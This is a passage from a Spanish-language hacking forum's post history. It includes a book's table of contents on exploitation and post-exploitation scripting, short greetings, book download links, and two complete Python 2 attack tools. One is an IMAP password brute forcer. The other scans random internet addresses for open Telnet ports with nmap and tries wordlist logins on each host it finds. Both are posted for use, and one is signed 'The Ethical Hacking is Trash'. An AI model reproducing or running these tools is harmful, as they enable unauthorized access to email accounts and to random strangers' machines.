What can we do with the information?................................204
Talking to Google......................................................................205
Google hacking.....................................................................205
Advanced operators ..............................................................206
Automating Google discovery..............................................207
Web automation with Perl.........................................................209
Pulling information from Web sites .....................................209
Working with metadata .............................................................212
Finding metadata ..................................................................212
Document metadata ..............................................................214
Metadata in media files ........................................................214
Putting it all together.................................................................219
Summary....................................................................................221
Endnotes ....................................................................................221
CHAPTER 9 Exploitation scripting ......................................... 223
Building exploits with Python...................................................223
Getting software ...................................................................223
Setting up debugging............................................................224
Causing our first crash..........................................................225
Using pattern_offset..............................................................228
Controlling EIP.....................................................................230
Adding shellcode ..................................................................232
Getting our shell ...................................................................236
Creating Metasploit Exploits.....................................................237
Starting a template................................................................237
Porting the exploit code........................................................239
Executing the exploit............................................................240
Exploiting PHP scripts ..............................................................242
Remote File Inclusion ..........................................................242
Command execution vulnerabilities .....................................246
Cross-Site Scripting...................................................................248
What is XSS?........................................................................248
Exploiting XSS.....................................................................249
Summary....................................................................................253
CHAPTER 10 Post-exploitation scripting .................................. 255
Why post-exploitation is important ..........................................255
Windows shell commands.........................................................255
User management .................................................................256
Gathering network information.................................................259
Windows network information gathering ............................260
Contents ix
Linux network information gathering..................................261
Scripting Metasploit Meterpreter ..............................................262
Getting a shell ......................................................................262
Building a basic script..........................................................264
Executing the script..............................................................269
Database post-exploitation ........................................................270
What is SQL injection?........................................................270
MySQL .................................................................................271
SQL injection on Microsoft SQL Server.............................278
Summary....................................................................................280


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#34
Presentaciones y cumpleaños / Re:Buenas tardes!!
Julio 22, 2017, 10:12:51 AM
Bienvenido  :)
#35
Python / Python - Imap Brute Src
Julio 22, 2017, 03:24:40 AM

Código: python
#!usr/bin/python
#IMAP Brute Forcer


import threading, time, random, sys, imaplib, socket
from imaplib import IMAP4
from copy import copy


if len(sys.argv) !=4:
	print "Usage: ./imapbrute.py <server> <userlist> <wordlist>"
	sys.exit(1)


try:
  	users = open(sys.argv[2], "r").readlines()
except(IOError): 
  	print "Error: Check your userlist path\n"
  	sys.exit(1)
  
try:
  	words = open(sys.argv[3], "r").readlines()
except(IOError): 
  	print "Error: Check your wordlist path\n"
  	sys.exit(1)


print "\n\t  imapBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"


wordlist = copy(words)


def reloader():
	for word in wordlist:
		words.append(word)


def getword():
	lock = threading.Lock()
	lock.acquire()
	if len(words) != 0:
		value = random.sample(words,  1)
		words.remove(value[0])		
	else:
		print "\nReloading Wordlist - Changing User\n"
		reloader()
		value = random.sample(words,  1)
		users.remove(users[0])
		
	lock.release()
	if len(users) ==1:
		return value[0][:-1], users[0]
	else:
		return value[0][:-1], users[0][:-1]
		
class Worker(threading.Thread):
	
	def run(self):
		value, user = getword()
		try:
			print "-"*12
			print "User:",user,"Password:",value
			M = imaplib.IMAP4(sys.argv[1])
			M = login(user, value)
			print "\t\nLogin successful:",user, value 
			M.close()
			M.logout()
			work.join()
			sys.exit(2)
		except(IMAP4.error, socket.gaierror, socket.error, socket.herror), msg: 
			print "An error occurred:", msg
			pass
 
for i in range(len(words)*len(users)):
	work = Worker()
	work.start()
	time.sleep(1)

The Ethical Hacking is Trash

Editar / Borrar Editar Mensaje    Respuesta rápida a este mensaje Responder    Citar Citar    Multi-Citar Este Mensaje  Blog this Post         
#36
Python / Telnet Brute Src
Julio 21, 2017, 03:34:12 PM

Código: python
#!usr/bin/python
#Uses nmap to check if telnet port is open, brute forces if it is.


import threading, time, StringIO, commands, random, sys, telnetlib, re
from copy import copy


if len(sys.argv) !=4:
	print "Usage: ./telnetbrute.py <how many to scan> <userlist> <wordlist>"
	sys.exit(1)


try:
  	users = open(sys.argv[2], "r").readlines()
except(IOError): 
  	print "Error: Check your userlist path\n"
  	sys.exit(1)
  
try:
  	words = open(sys.argv[3], "r").readlines()
except(IOError): 
  	print "Error: Check your wordlist path\n"
  	sys.exit(1)


print "\n\t   d3hydr8[at]gmail[dot]com telnetBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1],"hosts"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"


wordlist = copy(words)


def scan():
	
	nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 -iR 1 -p 23 | grep open -B 3')[1]).readlines()
	
	for tmp in nmap:
		ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
		if ipaddr:    		
			return ipaddr


def reloader():
	for word in wordlist:
		words.append(word)


def getword():
	lock = threading.Lock()
	lock.acquire()
	if len(words) != 0:
		value = random.sample(words,  1)
		words.remove(value[0])
		
	else:
		print "Reloading Wordlist\n"
		reloader()
		value = random.sample(words,  1)
		
	lock.release()
	return value[0][:-1]
		
class Workhorse(threading.Thread):
	
	def run(self):
		value = getword()
		try:
			print "-"*12
			print "User:",user[:-1],"Password:",value
			tn = telnetlib.Telnet(ipaddr[0])
			tn.read_until("login: ")
			tn.write(user[:-1] + "\n")
			if password:
					tn.read_until("Password: ")
					tn.write(value + "\n")
			tn.write("ls\n")
			tn.write("exit\n")
			print tn.read_all()
			print "\t\nLogin successful:",user[:-1], value
			tn.close()
			work.join()
			sys.exit(2)
		except: 
			pass


for x in range(int(sys.argv[1])):
	print "Scanning:",x,"of",sys.argv[1]
	ipaddr = scan()
	if ipaddr != None:
		print "\n\tAttempting BruteForce:",ipaddr[0],"\n"
		for user in users:
			for i in range(len(words)):
				if i == 0: reloader()
				work = Workhorse()
				work.start()
				time.sleep(2)
#37
Análisis y desarrollo de malwares / Re:Creando un Rasonware para Android desde 0!
Julio 21, 2017, 09:23:43 AM
Buenísimo el aporte, debería postularse para estar en el Blog  :)
#38
Cursos, manuales y libros / Build Your Own Database Driven Web Site Using PHP MySQL, 4th Edition
Julio 21, 2017, 09:19:32 AM

Código: php
Preface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
xix
1. Installation
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
1
2. Introducing MySQL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
53
3.  Introducing  PHP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
73
4. Publishing MySQL Data on the Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
115
5. Relational Database Design
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
151
6. Structured PHP Programming . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
171
7. A Content Management System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
197
8. Content Formatting with Regular Expressions . . . . . . . . . . . . . . . . . . . . . .
241
9. Cookies, Sessions, and Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
261
10.  MySQL  Administration
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
313
11.  Advanced  SQL  Queries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
337
12.  Binary  Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
357
A. MySQL Syntax Reference . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
389
B.  MySQL  Functions
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
415
C. MySQL Column Types
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
435
D. PHP Functions for Working with MySQL . . . . . . . . . . . . . . . . . . . . . . . . . . .
449
Index
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
463


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#39
C# - VB.NET / FxTool Src
Julio 21, 2017, 09:17:02 AM


Enlace de descarga:
Código: php
https://jumpshare.com/v/TXEqHRkwB9Epyv9wnpns

#40
Cursos, manuales y libros / Dangerous Google - Searching For Secrets
Julio 20, 2017, 12:28:34 PM


Enlace de descarga:
Código: php
https://jumpshare.com/v/D19Dw6HIWsFxBOQ3i8Kk
Páginas 1 2 3 4 ... 19